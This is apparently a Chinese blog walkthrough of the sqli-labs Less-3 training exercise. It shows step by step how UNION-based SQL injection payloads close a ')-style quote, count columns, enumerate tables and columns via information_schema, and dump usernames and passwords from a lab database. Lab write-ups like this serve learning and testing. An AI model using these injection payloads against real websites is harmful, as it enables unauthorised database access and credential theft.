SQL注入之sqlilabs:less-3

题目类型:基于报错的GET单引号字符型注入(带干扰)

测试地址:http://192.168.101.9/sqlilabs/Less-3/?id=1

       访问该网址,页面返回结果如图

0x01 判断注入参数类型

       在URL后添加一个单引号 ,页面报错。根据报错信息判断,此处为字符型注入,且多了“)”干扰闭合。页面返回结果如图

0x02 判断字段数量

        根据错误提示,将URL后单引号改为”')“闭合掉干扰的“('”,然后使用二分法尝试得出字段数为3。页面返回结果如图

Payload -> 192.168.101.9/sqlilabs/Less-3/?id=1') order by 3--+

0x03 判断是否回显及回显位置

       将前面的id改为-1,根据union语句,得出回显位置为2,3。如图所示

       Payload -> 192.168.101.9/sqlilabs/Less-3/?id=-1') union select 1,2,3--+

0x04 查询数据库名称

        根据回显位置,将对应sql语句放置在2和3处。页面返回结果如图

Payload -> 192.168.101.9/sqlilabs/Less-3/?id=-1') union select 1,version(),database()--+

0x05 查询表名

       数据版本为5.0以上,从默认表information_schema中取数。页面返回结果如图

       Payload -> 192.168.101.9/sqlilabs/Less-3/?id=-1') union select 1,version(),group_concat(table_name) from information_schema.tables where table_schema='security'--+

0x06 查询列名

       页面返回结果如图

       Payload -> 192.168.101.9/sqlilabs/Less-3/?id=-1') union select 1,version(),group_concat(column_name) from information_schema.columns where table_name='users'--+

0x07 查询数据

        页面返回结果如图

        Payload -> 192.168.101.9/sqlilabs/Less-3/?id=-1') union select 1,group_concat(username),group_concat(password) from users--+

  Bingo!拿到后台管理员admin

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值